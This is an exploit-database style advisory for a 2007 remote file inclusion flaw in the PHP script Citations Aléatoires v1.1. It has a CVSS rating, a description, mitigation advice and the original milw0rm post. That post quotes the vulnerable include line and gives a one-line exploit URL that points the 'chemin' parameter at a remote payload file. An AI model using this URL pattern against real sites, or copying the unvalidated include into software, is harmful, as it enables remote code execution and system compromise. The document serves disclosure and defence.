Citations Aléatoires v1.1

vendor:

Citations Aléatoires

by:

GolD_M = Mahmood_ali

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: Citations Aléatoires

Affected Version From: Citations Aléatoires v1.1

Affected Version To: Citations Aléatoires v1.1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

The vulnerability exists in the /i-accueil.php file of the Citations Aléatoires v1.1 script. The script includes a file without properly validating user-supplied input, allowing an attacker to include arbitrary remote files. This can lead to remote code execution and compromise of the affected system.

Mitigation:

To mitigate this vulnerability, it is recommended to validate user input before including files and to use a whitelist approach instead of a blacklist approach.

Source

Exploit-DB raw data:

/###################################################################\
# Citations Aléatoires v1.1                                         #
# =========================================================         #
# Published : 2007-01-12                                            #
# Remote: Yes                                                       #
# Site:  ftp://ftp1.comscripts.com/PHP/1809_citation-11.zip         #
#####################################################################
# Author: GolD_M = Mahmood_ali                                      #
# Contact: HackEr_@W.Cn                                             #
# =====================================================             #
# ThanX =All My Friends& ABDULLAH00& AsbMay& ToOoFa& KaBaRa& str0ke #
# SpeciaL GreeTz : Tryag-Team & 4lKaSrGoLd3n-Team                   #
\###################################################################/
# /i-accueil.php                                                    #
# Line:                                                             #
# /13                                                               #
# Vulnerable Code:                                                  #
# include("$chemin/mod_news/index.php");                            #
# 3XP|0!T :                                                         #
# /i-accueil.php?chemin=EV!L.C0D3.TxT                               #
#        /#######################################\                  #
#        #         Tryag.Com & Dwrat.Com         #                  #
#        \#######################################/                  #
\###################################################################/

# milw0rm.com [2007-01-12]